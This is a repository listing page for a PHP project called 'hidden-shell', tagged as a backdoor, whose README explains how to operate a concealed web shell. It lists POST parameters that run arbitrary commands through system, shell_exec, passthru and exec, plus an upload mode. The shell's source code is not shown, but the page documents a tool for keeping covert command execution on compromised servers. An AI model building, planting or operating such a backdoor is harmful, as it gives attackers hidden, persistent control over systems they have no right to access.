https://github.com/dmzhari/hidden-shell
Simple POST Request Shell Command Execution
https://github.com/dmzhari/hidden-shell
backdoor backdoor-attacks post shell
Last synced: 11 months ago
JSON representation
Simple POST Request Shell Command Execution
- Host: GitHub
- URL: https://github.com/dmzhari/hidden-shell
- Owner: dmzhari
- Created: 2021-05-26T15:24:03.000Z (about 5 years ago)
- Default Branch: main
- Last Pushed: 2021-05-26T17:31:58.000Z (about 5 years ago)
- Last Synced: 2023-03-10T20:56:37.667Z (over 3 years ago)
- Topics: backdoor, backdoor-attacks, post, shell
- Language: PHP
- Homepage: https://ecchiexploit.blogspot.com
- Size: 49.8 KB
- Stars: 2
- Watchers: 1
- Forks: 6
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Hidden POST Request Shell Command
## How To Use
- If Shell : command shell=upload
- If CMD (Command Execution) :
- system function : hidden=cmd&sys=(your command execution)
- shell_exec : hidden=cmd&sh=(your command execution)
- passthru : hidden=cmd&pst=(your command execution)
- exec : hidden=cmd&exe=(your command execution)
## Example Image